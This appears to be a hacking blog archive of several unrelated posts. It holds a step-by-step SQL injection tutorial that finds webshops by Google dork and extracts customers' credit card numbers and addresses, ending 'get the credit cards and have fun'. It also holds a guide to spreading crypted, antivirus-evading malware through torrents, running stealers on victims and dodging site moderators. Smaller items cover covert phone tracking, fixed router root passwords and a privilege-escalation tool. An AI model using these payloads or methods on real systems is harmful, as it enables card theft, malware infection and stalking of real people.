Friday, March 13, 2015

Webshop Hacking

1) First, search Google for webshops. I used this dork:

CODE:
inurl:customer_testimonials.php testimonial_id=
2) Let's say we got this site:
CODE:
http://www.JustExample.com/customer_...stimonial_id=7
3) Check whether it is vulnerable to SQLi by appending a single quote to the URL:
CODE:
'
>>>
CODE:
http://www.JustExample.com/customer_...stimonial_id=7'
If the page returns a database error, the parameter is being pasted straight into the query and the site is very likely vulnerable. The reverse does not hold: a site that shows no error may still be injectable (blind SQLi), it just does not echo the error back.


4) Next, find the number of columns in the query. Append an ORDER BY, starting with 10:
CODE:
+order+by+10--
>>>
CODE:
http://www.JustExample.com/customer_...+order+by+10--
If there is no error, the query has at least 10 columns; if there is an error, it has fewer than 10 (ORDER BY n fails as soon as n exceeds the column count).


5) This time we get an error, so the count is somewhere from 1 to 9. Try a UNION SELECT with nine placeholder columns:
CODE:
+union+select+1,2,3,4,5,6,7,8,9--
>>>
CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--
No error this time, so the query has 9 columns. (A UNION only succeeds when both sides return the same number of columns, so if this had failed you would step down to 8, 7, and so on.)


6) Some of the placeholder numbers are now rendered somewhere in the page; those are the columns whose output you can read. In practice it is often column 3 or 6. Let's say column 3 is shown. Replacing that placeholder with the MySQL functions user(), database() and version() gives the database user, database name and database version:

*- database user
CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--

*- database name
CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--

*- database version
CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


7) Next we need the table names. Append this to the URL:
CODE:
+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--
>>>
CODE:
http://www.JustExample.com/customer_...chema.tables--




8) Now the column names. Append this to the URL (char(58) is the ":" separator between table and column):
CODE:
+union+select+1,2,concat(table_name,char(58),column_name),4,5,6,7,8,9+from+information_schema.columns--
>>>
CODE:
http://www.JustExample.com/customer_...hema.columns--
9) Now all that is left is to read the orders and customer tables (that is where the credit cards are). Appending this to the URL returns the payment method, card type, card number and expiry date:
CODE:
+union+select+1,2,concat(payment_method,char(58),cc_type,char(58),cc_number,char(58),cc_expires),4,5,6,7,8,9+from+orders--
>>>
CODE:
http://www.JustExample.com/customer_...+from+orders--

Appending this instead returns the full customer record for each order: address, phone number, e-mail, postcode, and all of the card details (0x2F is the "/" separator):
CODE:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders--
>>>
CODE:
http://www.JustExample.com/customer_testimonials.php?&testimonial_id=7+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders--




now one step left


10 ) get the credit cards and have fun
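As an added example (not code from the original post), here is the flaw behind customer_testimonials.php reproduced in Python against an in-memory SQLite database, so the probing steps above can be run offline and compared with the parameterized fix. SQLite stands in for MySQL (so there is no information_schema, but ORDER BY and UNION probing behave the same way). The table and column names mirror the tutorial and the rows are constructed sample data; nothing here comes from a real shop.

```python
# Added example, not code from the original post. SQLite stands in for MySQL;
# table/column names mirror the tutorial and the rows are constructed data.
import sqlite3


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE customer_testimonials (
            testimonial_id INTEGER, customers_name TEXT, testimonial TEXT);
        INSERT INTO customer_testimonials VALUES (7, 'Alice', 'Great shop');
        CREATE TABLE orders (
            orders_id INTEGER, customers_email_address TEXT, payment_method TEXT);
        INSERT INTO orders VALUES (1001, 'alice@example.test', 'card');
    """)
    return con


def vulnerable_lookup(con, testimonial_id):
    # The bug: the request parameter is pasted into the SQL text, so anything
    # after the number (a quote, ORDER BY, UNION SELECT ...) is parsed as SQL.
    sql = ("SELECT testimonial_id, customers_name, testimonial "
           "FROM customer_testimonials WHERE testimonial_id = " + testimonial_id)
    return con.execute(sql).fetchall()


def safe_lookup(con, testimonial_id):
    # The fix: a bound parameter is sent as a value and never parsed as SQL.
    sql = ("SELECT testimonial_id, customers_name, testimonial "
           "FROM customer_testimonials WHERE testimonial_id = ?")
    return con.execute(sql, (testimonial_id,)).fetchall()


def quote_probe_errors(con):
    """Step 3: a lone quote leaves an unterminated string literal -> syntax error."""
    try:
        vulnerable_lookup(con, "7'")
    except sqlite3.OperationalError:
        return True
    return False


def count_columns(con, max_cols=10):
    """Steps 4-5: ORDER BY n fails as soon as n exceeds the number of columns."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(con, f"7 ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols  # at least max_cols columns; raise the ceiling to pin it down


def union_extract(con, n_cols, expr, table, shown_col=2):
    """Steps 7-9: pad a UNION SELECT with literals and put expr in the column the
    page renders (shown_col is 1-based, like the tutorial's '1,2,3,...' list)."""
    cols = ["1"] * n_cols
    cols[shown_col - 1] = expr
    payload = f"7 UNION SELECT {','.join(cols)} FROM {table}--"
    rows = vulnerable_lookup(con, payload)
    # Every row except the legitimate testimonial came from the other table.
    return [row[shown_col - 1] for row in rows if row[0] != 7]


if __name__ == "__main__":
    db = build_db()
    print("quote probe errors:", quote_probe_errors(db))
    print("columns:", count_columns(db))
    print("leaked:", union_extract(db, 3, "customers_email_address", "orders"))
    print("same payload, parameterized:",
          safe_lookup(db, "7 UNION SELECT 1,2,3 FROM orders--"))
```

The last line of the main block is the point of the fix: the same payload that leaks a row through `vulnerable_lookup` simply matches nothing through `safe_lookup`, because the driver sends it as a value to compare against testimonial_id rather than as SQL text.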

Spreading via Torrents

What will I learn in this tutorial?
How to correctly create a torrent that is destined for success.
How to make sure you get the most downloads possible.
And how to make the process much easier and more efficient.
Plus some great tips and tricks that you may not have seen in other tutorials.


Prelude:


This is not something that you will automatically have success with overnight. It takes some practice to get these things down to a science. At first it may seem overwhelming, and things happen that you can only learn from over time and experience, which can be frustrating, but I am giving you all of the best tips to be successful in torrent spreading to make it easier for you. Hope you enjoy.




Basics
If you already know how to create torrents and how to use them then skip over this section. Still some useful information in here though.


Advanced


Preparation
Crypting and binding:
Make sure your server is 100% FUD on a run/scan. THIS IS THE MOST IMPORTANT BASIC STEP.
When binding, make sure to set the server as the post-install command. Most binders do this already when included with crypters, or when made for hacking purposes.
If using iExpress, don't bind to anything over 80 megs. It won't execute correctly.
Always bind to the setup, not any other files that you include in the .rar. And if the setup is over 80 megs and you are using iExpress, I suggest trying a different program.


Creating a good torrent:
Use a popular program.
DO NOT USE AN ANTI-VIRUS OR FIREWALL PROGRAM!!!!
All torrent users want to find cracked programs, but DO NOT include the words "Cracked","Leaked","Keygen", or anything of that nature in your torrent name. Those torrents always get checked out first by site moderators, and for the most part, they are good. Especially the mods on #.org. Even if your server is FUD.
Use this list of trackers i am providing you with when you create the torrent. Also feel free to add your own.
Trackers:


Make your torrent in .rar format and add extra files that look like legit components to the setup. But place the setup in plain sight as well as a "readme.txt" that explains how to run the setup. I have provided you with an example.






Uploading and seeding


Ok, here's where things start to need more attention to detail. It is a 3 day process, and requires some patience. After you get better at this method, you can throw multiple torrents up and manage them every 3 days, but be sure to keep them all on the same schedule to keep things organized.
Getting good accounts:
At the beginning of the 3 day cycle, go create an account at http://www.#.org. This is the hardest site to get accounts for, and ironically, the best site to get downloads. If you create an account and then 3 hours later post a program, your torrent will last maybe 4 hours if you're lucky, even if it's FUD. So it's easy to create the account early and have the torrent up for longer.
Look for accounts here on HF. If you see a TPB account being sold, buy it up as fast as possible. But always make sure to take the correct precautions when dealing with anyone on the internet. Anything with uploads and older than 2 weeks is a great account for spreading on TPB. Anything extra will just help even more.
Torrent spreading leads to more torrent accounts. Always run a stealer through your new victims to get as many accounts as possible. DDoser 4.1 is great for this since it has one built in. Don't cry if you lose some victims, because the accounts will lead to much more, and your servers are still fresh.
Having a good account on Demonoid and IPtorrents is great. The U/D ratio actually means a lot to the users. So try to find the best accounts for those 2 sites.


Seeding:
You need some other seeds besides your connection before starting the 3 day cycle of uploading.
Go buy a seedbox or ask a couple friends to help you seed for a day or so. I would recommend a seedbox because they are relatively cheap, and make a HUGE difference in the beginning. This is also very important.
As soon as you have a good way of getting a few initial seeds, the rest is the order in which you upload to sites. Which i will also be helping you with.




Uploading 3 day schedule
Day 1:
Upload to the following sites. And if you can on some of them, spam them every couple of hours to get maximum exposure, like on btjunkie.org.




Dont get impatient, it will take a little bit to get seeds. But the more seeds you get, the more people will download your torrent on the next set of sites.


Day 2:
Now on to the next set of sites. These will guarantee some good seeds if you advertise your torrent correctly.




Only post on these sites until 24 hours after you posted on the day 1 sites.


Day 3:
And finally the big 3 sites. Here is where it all comes together and you get to see your torrent flourish.




Then just watch them and see how they do. I will also post some useful tips for each site.




Uploading tips for the big sites
#.org
Make sure to add a picture and product description in the torrent posting.
Act like you the part of a commonly known uploading crew to the site.
Upload at around 4 a.m. central US time. This makes sure that most of the mods are asleep, and your torrent will be farther down the list so the mods won't check it in the morning, because it doesn't look to be very malicious with lots of seeds, a commonly known uploading crew in the name, no advertising of a cracked program, and hopefully a good account. Your torrent could live for up to 1-2 weeks depending on the circumstances.


Demonoid.com
Get the best accounts you can find. Or at least good ones until you get better at using this method.
Make sure to add a picture and product description in the torrent posting.
The mods at Demonoid have never taken down my torrents until something got reported, which will happen depending on how many downloads you get. The best thing to do is make sure it's FUD for Demonoid. TPB and IPtorrents are all about taking advantage of how much volume they have to sort through.
Always add the "Uploaded at demonoid.com.txt" into the torrent.
Some people have claimed to have done this and still had their torrent denied. First create the .rar with all the files inside one folder added to it, and let it compress. Then drag the demonoid.txt file into it so it doesn't go into the original folder. The mods can't see the .txt file if it's in the folder; it will only show 1 folder contained. Here's how it should look.




IPtorrents.com
Find a decent account to post with.
Make sure to add a picture and product description in the torrent posting.
And again, upload at around 4 a.m. central US time. This makes sure that most of the mods are asleep and your torrent will do better.




Closing comments


This does take some self-discipline and practice to get right, but it is very much worth the time to learn. I have seen way too many people asking how to spread via torrents lately, so I thought it would be a good idea to contribute this back to the community. If I have forgotten some things, I will add them in later. If this helped you, please let me know; that's why I posted it.

40 Hacking Tips For Beginners

1) Learning scripting languages such as Python, Perl and Ruby helps you automate your tasks and will certainly improve your skills.


2) Understanding all possible user inputs is the fastest way to hack into systems.


3) When you gain access to an account or whatever you are hacking into, best practice is not to alter anything; just monitor the activity and keep fetching the information you need.


4) Travel and see different countries, it will make you better.


5) Never hesitate to use Google and the other resources available, e.g. exploit-db, and stay up to date with the versions and the bugs in each version. For example, anyone looking to hack or pentest a WordPress site should be well aware of at least the 3.0+ releases, so that whichever version the site runs, they know its vulnerabilities and how to exploit them.


6) RTFM; don't expect handouts. Educated questions get you educated answers.


7) Move to Linux, learn programming languages (C, Perl, Lisp, Java and HTML) and write open source programs.
Improve your functional English.


8) The most important factor in becoming a good hacker is a personal interest in computers. You also have to be definite in your work: take a serious interest in one thing at a time. After covering the appropriate level of theory, try it in practice until you are satisfied. Watch tutorials only to pick up points, not to follow them from A to Z, because you only become a good learner when you intend to do things creatively yourself.


9) Learn how the old hackers started; don't focus on new programs like BackTrack and Metasploit. Learn manual hacking, learn coding and be patient! Knowledge will come with time; practice all the methods.


10) Do not rely on tricks for hacking, as they will keep you a script kiddie; get a deep understanding of things. Also don't rush from one topic to another. All of this combined will make you a better hacker. "Slow and steady wins the race."


11) Support will always lift you up. Join groups and forums. Keep yourself updated with the latest hacking news by reading blogs (like this one), tweets etc.


12) Understand which programming language to use at which moment. Your time is valuable, so don't waste it writing something that could have been done faster! (And understand the difference between a scripting language and a programming language; Python, for example, is a programming language.)


13) While hacking, stay mentally focused on each step. During a step, always remember your next steps and how you will link them. Don't always use old methods and tricks; try new ones and use your own mind too. And remember there is no shortcut in hacking: to become a hacker, you have to give your whole passion to it. "Hacking is an art, and a hacker is an artist."


14) Keep this attitude: "Sweat more in practice, so you bleed less in war."


15) Whatever you're going to test, start with the basic stuff. If you don't know any, start learning.


16) Enumeration is the key to pwnage: the more you enumerate, the more attack surface you get.


17) Be patient! Learn different protocols and read the RFCs to understand how they work and whether they have "security by design" issues. After that, try to understand the context you're in and develop an exploit for that particular context.


18) Sleep less, read more. Learn, think, try, fail and never give up. Remember, "...imagination will take you everywhere".


19) Don't compete with anyone and never think you are the best; just compete with "the you in the past". There will always be a vulnerability waiting to be discovered by someone who thinks differently. Understanding human logic makes things easier. "Hackers realize, kiddies memorize."


20) Learn your own systems inside out before moving on to other systems. The better you know your own, the more capable you will be when it comes time to make your system work for you.




21) To be a good hacker you need good social engineering skills. Try to understand your victim's mentality; it will give you the ability to guess his or her confidential information.


22) A great person once said, "If I had 8 hours to chop down a tree, I'd spend 6 hours sharpening my axe." Apply this to yourself. Prepare yourself! Learn programming, networking, scripting and the rest, be passionate, motivate yourself, then start hacking with your own ideas. You will surely win!


23) Use your inner power to become a great hacker. Just keep reading; the more you read, the more you understand what happens behind the scenes.


24) A startup now can be just a pair of 22 year old guys. A company like that can move much more easily than one with 10 people, half of whom have kids.


25) Think of all the psychic energy expended in seeking a fundamental distinction between "algorithm" and "program".


26) If you don't have time to do it right, when will you have time to do it over? ~Sunny Rockzzzz
27) Out in the field, any connection with home just makes you weaker. It reminds you that you were once civilized, soft; and that can get you killed faster than a bullet through the head.




28) Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.


29) Be very careful. We suggest getting a book on HTML to avoid becoming a real legend in the hacker world. Putting up a web page before you know how to put up a web page is generally a very bad idea. The .gov sites are an exception.


30) We were addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses.


31) To be a good hacker you have to learn on your own. Learn from books like "The Basics of Hacking and Penetration Testing" and "The Web Application Hacker's Handbook" (2nd ed.). Once you have worked through these books, I promise you will be able to hack systems as well as web apps.


32) Try to see, feel and possibly touch everything that you learn, only then you will be confident about your attacks/defenses.


33) Adopt the mindset of a hacker.


34) You may not be there yet but with everyday practice you will be closer than yesterday.


35) Code has to be written by a hacker. Don't get caught. Learn the basic functionality of a system and network, then explore their loopholes. Every developer makes mistakes while developing; identify the exploit and notify the developer.


36) Learn Russian. Every infosecurity geek should know Russian.


37) When you learn something in this field, always put it to good use .Defacing websites will not make you a better hacker, but, helping someone with their security might earn you a respect even higher than what a blackhat may get .


38) Learn how the technology you are trying to hack works inside and out before you try to hack it. It's much easier to find a way in if you understand exactly how and why the technology works.


39) Be consistent. If you want to learn, dedicate a certain amount of time every week to learning. Don't take breaks because you will forget things. When it comes to ethical hacking, you have to learn and understand certain things before you can move on to understanding something else. Building on top of itself.


40) Behind every successful coder there is an even more successful de-coder who understands that code. -HackersAuthority

Wednesday, February 18, 2015

Bank Hackers Steal Millions via Malware

PALO ALTO, Calif. — In late 2013, an A.T.M. in Kiev started dispensing cash at seemingly random times of day. No one had put in a card or touched a button. Cameras showed that the piles of money had been swept up by customers who appeared lucky to be there at the right moment.
But when a Russian cybersecurity firm, Kaspersky Lab, was called to Ukraine to investigate, it discovered that the errant machine was the least of the bank’s problems.
The bank’s internal computers, used by employees who process daily transfers and conduct bookkeeping, had been penetrated by malware that allowed cybercriminals to record their every move. The malicious software lurked for months, sending back video feeds and images that told a criminal group — including Russians, Chinese and Europeans — how the bank conducted its daily routines, according to the investigators.
Then the group impersonated bank officers, not only turning on various cash machines, but also transferring millions of dollars from banks in Russia, Japan, Switzerland, the United States and the Netherlands into dummy accounts set up in other countries.


How Hackers Infiltrated Banks

Since late 2013, an unknown group of hackers has reportedly stolen $300 million, possibly as much as triple that amount, from banks across the world, with the majority of the victims in Russia. The attacks continue, all using roughly the same modus operandi:

  1. Hackers send email containing a malware program called Carbanak to hundreds of bank employees, hoping to infect a bank's administrative computer.
  2. Programs installed by the malware record keystrokes and take screenshots of the bank's computers, so that the hackers can learn bank procedures. They also enable the hackers to control the banks' computers remotely.
  3. By mimicking the bank procedures they have learned, the hackers direct the banks' computers to steal money in a variety of ways: transferring money into the hackers' fraudulent bank accounts; using e-payment systems to send money to fraudulent accounts overseas; and directing A.T.M.s to dispense money at set times and locations.

In a report to be published on Monday, and provided in advance to The New York Times, Kaspersky Lab says that the scope of this attack on more than 100 banks and other financial institutions in 30 nations could make it one of the largest bank thefts ever — and one conducted without the usual signs of robbery.
The Moscow-based firm says that because of nondisclosure agreements with the banks that were hit, it cannot name them. Officials at the White House and the F.B.I. have been briefed on the findings, but say that it will take time to confirm them and assess the losses.
Kaspersky Lab says it has seen evidence of $300 million in theft through clients, and believes the total could be triple that. But that projection is impossible to verify because the thefts were limited to $10 million a transaction, though some banks were hit several times. In many cases the hauls were more modest, presumably to avoid setting off alarms.
The majority of the targets were in Russia, but many were in Japan, the United States and Europe.
No bank has come forward acknowledging the theft, a common problem that President Obama alluded to on Friday when he attended the first White House summit meeting on cybersecurity and consumer protection at Stanford University. He urged passage of a law that would require public disclosure of any breach that compromised personal or financial information.
But the industry consortium that alerts banks to malicious activity, the Financial Services Information Sharing and Analysis Center, said in a statement that “our members are aware of this activity. We have disseminated intelligence on this attack to the members,” and that “some briefings were also provided by law enforcement entities.”
The American Bankers Association declined to comment, and an executive there, Douglas Johnson, said the group would let the financial services center’s statement serve as the only comment. Investigators at Interpol said their digital crimes specialists in Singapore were coordinating an investigation with law enforcement in affected countries. In the Netherlands, the Dutch High Tech Crime Unit, a division of the Dutch National Police that investigates some of the world’s most advanced financial cybercrime, has also been briefed.
The silence around the investigation appears motivated in part by the reluctance of banks to concede that their systems were so easily penetrated, and in part by the fact that the attacks appear to be continuing.
The managing director of the Kaspersky North America office in Boston, Chris Doggett, argued that the “Carbanak cybergang,” named for the malware it deployed, represents an increase in the sophistication of cyberattacks on financial firms.
“This is likely the most sophisticated attack the world has seen to date in terms of the tactics and methods that cybercriminals have used to remain covert,” Mr. Doggett said.
As in the recent attack on Sony Pictures, which Mr. Obama said again on Friday had been conducted by North Korea, the intruders in the bank thefts were enormously patient, placing surveillance software in the computers of system administrators and watching their moves for months. The evidence suggests this was not a nation state, but a specialized group of cybercriminals.
But the question remains how a fraud of this scale could have proceeded for nearly two years without banks, regulators or law enforcement catching on. Investigators say the answers may lie in the hackers’ technique.
In many ways, this hack began like any other. The cybercriminals sent their victims infected emails — a news clip or message that appeared to come from a colleague — as bait. When the bank employees clicked on the email, they inadvertently downloaded malicious code. That allowed the hackers to crawl across a bank’s network until they found employees who administered the cash transfer systems or remotely connected A.T.M.s.
Then, Kaspersky’s investigators said, the thieves installed a “RAT”— remote access tool — that could capture video and screenshots of the employees’ computers.
“The goal was to mimic their activities,” said Sergey Golovanov, who conducted the inquiry for Kaspersky Lab. “That way, everything would look like a normal, everyday transaction,” he said in a telephone interview from Russia.
The attackers took great pains to learn each bank’s particular system, while they set up fake accounts at banks in the United States and China that could serve as the destination for transfers. Two people briefed on the investigation said that the accounts were set up at J.P. Morgan Chase and the Agricultural Bank of China. Neither bank returned requests for comment.
Kaspersky Lab was founded in 1997 and has become one of Russia’s most recognized high-tech exports, but its market share in the United States has been hampered by its origins. Its founder, Eugene Kaspersky, studied cryptography at a high school that was co-sponsored by the K.G.B. and Russia’s Defense Ministry, and he worked for the Russian military before starting his firm.
When the time came to cash in on their activities — a period investigators say ranged from two to four months — the criminals pursued multiple routes. In some cases, they used online banking systems to transfer money to their accounts. In other cases, they ordered the banks’ A.T.M.s to dispense cash to terminals where one of their associates would be waiting.
But the largest sums were stolen by hacking into a bank’s accounting systems and briefly manipulating account balances. Using the access gained by impersonating the banking officers, the criminals first would inflate a balance — for example, an account with $1,000 would be altered to show $10,000. Then $9,000 would be transferred outside the bank. The actual account holder would not suspect a problem, and it would take the bank some time to figure out what had happened.  
“We found that many banks only check the accounts every 10 hours or so,” Mr. Golovanov of Kaspersky Lab said. “So in the interim, you could change the numbers and transfer the money.”
The hackers’ success rate was impressive. One Kaspersky client lost $7.3 million through A.T.M. withdrawals alone, the firm says in its report. Another lost $10 million from the exploitation of its accounting system. In some cases, transfers were run through the system operated by the Society for Worldwide Interbank Financial Telecommunication, or Swift, which banks use to transfer funds across borders. It has long been a target for hackers — and long been monitored by intelligence agencies.
Mr. Doggett likened most cyberthefts to “Bonnie and Clyde” operations, in which attackers break in, take whatever they can grab, and run. In this case, Mr. Doggett said, the heist was “much more ‘Ocean’s Eleven.’ ”

Saturday, February 7, 2015

Using your own router in tandem with the Actiontec V1000H Router and Telus Optik TV


In the ideal big-brother world of Telus they would have you use only their supplied hardware for networking, i.e. the Actiontec V1000H router. For advanced users this is a serious pain, since your own router probably has a much richer feature set. Others may simply want complete control of their network and its hardware.

The solution? Log in as root and set the Actiontec to "bridged mode", essentially turning it into a plain modem. Now you can use your own router connected directly to the WAN. If you call Telus tech support they won't have a clue what you're talking about when you mention bridging, or they will just tell you it's not possible. I understand that it's more difficult for the Telus support people to read from their script when every customer could have a different router, but I, like many others, never call Telus tech support unless something is broken on their side, like my service dropping completely. For anything else you may be better off talking to a brick wall.

If you don't enable bridging on the Actiontec and put your own router behind it, you end up with double NAT. It may work, but it is a pain to configure and can cause peculiar networking problems, since inbound port forwards and anything that relies on UPnP or VPN passthrough now have to traverse two NATs. This is made worse by the fact that the customer account cannot fully configure the Actiontec for this situation, e.g. disabling its DHCP server. See this explanation of double NAT for more info.

The below instructions work flawlessly with my DDWRT54G v3 running Tomato Firmware v1.28.7633 .3-Toastman-VLAN-IPT-ND ND VPN


To start - knowing your logins:


There are several logins for the Actiontec; the one you are given is a crippled account with limited access to settings. Note that the tech and root passwords below are fixed per firmware version, not per device, so anyone who can reach the web interface can use them; keep remote management disabled.

default customer login is (can be changed after first login)
username: admin
password: telus

"poweruser" login - some options are still locked
username: tech
password: t3lu5tv

root login - all features are unlocked and configurable
(old firmware 31.30L.48)
username: root
password: m3di@r00m!

(new firmware 31.30L.55)
username: root
password: Thr33scr33n!


Bridged Mode - so you can use your third party router:


Before enabling bridged mode you may want to turn off wireless if you're going to use it on your own router. I've had some problems turning it off after enabling bridged mode. Also, you can unscrew the attached antennas, you don't need them if you've turned off wireless.

On your third party router change the default LAN subnet to something outside of the Actiontec's default subnet 192.168.1.0 255.255.255.0 - 10.0.0.0 255.0.0.0 should work fine.

To enable transparent bridging mode:
  1. log in as root
  2. go to "Advanced Setup"
  3. WAN IP Addressing
  4. 2. Select the ISP protocol below
  5. select "RFC 1483 Transparent Bridging"
Plug your own router's WAN port into one of the Actiontec's LAN ports. Your router should now pass transparently through the Actiontec and get a DHCP-assigned IP address directly from Telus. Some additional configuration may be necessary on your router.
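The quickest way to confirm the bridge took effect is to look at the address your own router's WAN port received: a public address means the Actiontec is bridging, a 192.168.1.x lease means it is still routing and you are in the double NAT situation described earlier. The following is an added example, not part of the original guide: it classifies the WAN address from `ip -4 addr` style output. The sample output is constructed (the public address is from the 203.0.113.0/24 documentation range), and the WAN interface name "vlan2" is an assumption; substitute whatever your firmware uses.

```python
# Added example, not part of the original guide. The sample `ip -4 addr` output
# is constructed and the WAN interface name "vlan2" is an assumption.
import ipaddress
import re

# Address ranges that should never appear on the WAN side of a router that sits
# directly behind a bridged modem.
NON_PUBLIC_SCOPES = [
    (ipaddress.ip_network("10.0.0.0/8"), "RFC 1918 private"),
    (ipaddress.ip_network("172.16.0.0/12"), "RFC 1918 private"),
    (ipaddress.ip_network("192.168.0.0/16"), "RFC 1918 private"),
    (ipaddress.ip_network("100.64.0.0/10"), "RFC 6598 carrier-grade NAT"),
    (ipaddress.ip_network("169.254.0.0/16"), "RFC 3927 link-local"),
]

# Constructed sample output. 203.0.113.42 is a documentation address standing
# in for a real ISP-assigned one; br0 is the router's own LAN side.
BRIDGED_OUTPUT = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
    inet 127.0.0.1/8 scope host lo
2: vlan2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    inet 203.0.113.42/24 brd 203.0.113.255 scope global vlan2
3: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    inet 10.0.0.1/8 brd 10.255.255.255 scope global br0
"""
# Same router, but the Actiontec is still handing out its own 192.168.1.x leases.
DOUBLE_NAT_OUTPUT = BRIDGED_OUTPUT.replace(
    "203.0.113.42/24 brd 203.0.113.255", "192.168.1.64/24 brd 192.168.1.255")


def classify_wan(addr):
    """Label an address as public or as one of the non-public scopes above."""
    ip = ipaddress.ip_address(addr)
    for net, label in NON_PUBLIC_SCOPES:
        if ip in net:
            return label
    return "public"


def wan_address(ip_addr_output, iface):
    """Return the first IPv4 address listed under iface in `ip -4 addr` output."""
    block = re.search(rf"^\d+: {re.escape(iface)}:.*?(?=^\d+: |\Z)",
                      ip_addr_output, re.M | re.S)
    if not block:
        return None
    m = re.search(r"\binet (\d+\.\d+\.\d+\.\d+)/\d+", block.group(0))
    return m.group(1) if m else None


def double_nat_verdict(ip_addr_output, iface):
    """Turn the WAN address into a one-line diagnosis."""
    addr = wan_address(ip_addr_output, iface)
    if addr is None:
        return "no IPv4 address on the WAN interface: check the cable and DHCP"
    label = classify_wan(addr)
    if label == "public":
        return f"{addr} is public: the Actiontec is bridging"
    if label.startswith("RFC 1918"):
        return f"{addr} is {label}: double NAT, the Actiontec is still routing"
    if label.startswith("RFC 3927"):
        return f"{addr} is link-local: no DHCP lease was received"
    return f"{addr} is {label}: the Actiontec is bridging, but the ISP is translating upstream"


if __name__ == "__main__":
    print(double_nat_verdict(BRIDGED_OUTPUT, "vlan2"))
    print(double_nat_verdict(DOUBLE_NAT_OUTPUT, "vlan2"))
```

On a Tomato or similar Linux-based router you would paste the real output of `ip -4 addr` (or `ifconfig`, after adjusting the regex) in place of the constructed sample; the 100.64.0.0/10 case is kept separate because a carrier-grade NAT address is not the Actiontec's fault and changing the bridge settings will not fix it.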

To connect to the Actiontec router while in bridging mode:

Directly connect a computer to the Actiontec and give the adapter a static IP in the Actiontec's default range; 192.168.1.1 should work.
Then connect to the router as usual at http://192.168.1.254

With bridging enabled, some strange behaviour is exhibited when logging in - you'll see below the log in section that it says you're already logged in as admin although you won't be able to view any of the configuration pages. When you log in as root you won't see any confirmation of a log in, you'll just get bumped back to the home page. You should be able to go to config pages once logged in though.

Alternatively you can log in using telnet if you want to enable it:
  1. Advanced Setup
  2. Remote
  3. Remote Telnet
  4. 1. Set the remote telnet state below.
  5. Local Telnet -> enable
  6. Set the user name and password for login
Use PuTTY or some other terminal client and log in with the username and password you've set. Telnet sends the credentials and the whole session in cleartext, so leave it on "Local" only and disable it again when you are done.
Once logged in, you have a crippled shell; commands like "ls" and "cd" won't work.
To get a slightly more functional shell, type "sh" to get a BusyBox shell.


To get Optik TV working with a third party router, you must enable multicasting:


If you don't have multicasting enabled on your third party router, TV channels will work for a few seconds then drop out.

For the tomato firmware this option is:
Advanced -> Firewall -> Multicast
Enable IGMPproxy
Check off the LAN segment you want to enable multicasting on - default should be LAN


Troubleshooting:


If you find you've locked yourself out of the router, or want to reset all the settings back to the defaults, do a factory reset.

Take a pen and press the recessed reset button (it sits in a hole marked with a red circle) for a few seconds until the power light turns red, then unplug the power and plug it back in. The router will take around 30 seconds to reboot with the default settings.

If you need to do a factory reset, or want to do other types of fiddling after being in bridged mode for a while, disconnect the phone cable first. Many people report that their firmware gets updated immediately after a factory reset while the phone cable is plugged in (i.e. while connected to the Internet), and that the root password has been changed (unconfirmed) on newer versions of the firmware.


Friday, February 6, 2015

Track anyone in the UK via SMS

By using one of the many mobile phone location tracking services aimed at businesses or concerned parents, and some trickery, it is possible to get almost anyone's mobile phone position without their agreement. All that is required is their mobile phone number and carrier.
Over the past year a number of sites have popped up offering web-based mobile phone tracking services. To use their services you purchase a monthly subscription or a set number of credits, and enter the target's phone number. The target then receives an SMS message asking them to confirm they consent to the tracking. After the target replies, the tracker can request their position online and receive a street address, post code, and map of their location with an accuracy of around 250 meters.
Source: Rootsecure
  • Although it is possible to get the location of a phone, the target will receive the various SMS confirmation messages, alerting them to the fact that they are being tracked.
  • Malicious use can be traced back to the tracker via credit card records or the tracker's registered phone.
More:
For the past week I’ve been tracking my girlfriend through her mobile phone. I can see exactly where she is, at any time of day or night, within 150 yards, as long as her phone is on. It has been very interesting to find out about her day. Now I’m going to tell you how I did it.
The Guardian
A service has launched in the UK which allows you to track any mobile phone around the globe and follow its movements from your own computer. The Guardian ran a feature on it yesterday called ‘How I stalked my girlfriend’. It painted a scary picture.
The service is run by World-Tracker, a company based on the Isle of Man. When a mobile number is entered onto the World-Tracker website, a text message is sent to that phone, to ask if the person carrying the phone wishes to be tracked.
The Register

LinEnum – Linux Enumeration & Privilege Escalation Tool

LinEnum will automate many of the local Linux enumeration and privilege escalation checks documented in this cheat sheet. It's a very basic shell script that performs over 65 checks, gathering everything from kernel information to possible escalation points such as potentially useful SUID/GUID files, Sudo/rhost misconfigurations and more.
An additional 'extra' feature is that the script will also use a provided keyword to search through *.conf and *.log files. Any matches will be displayed along with the full file path and the line number on which the keyword was identified.
After the scan has completed (please be aware that it may take some time) you'll be presented with possibly quite extensive output, in which any key findings are highlighted in yellow and everything else is documented under the relevant headings.
Usage
Checks/Tasks Performed
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
    • Current IP
    • Default route details
    • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • List all users including uid/gid information
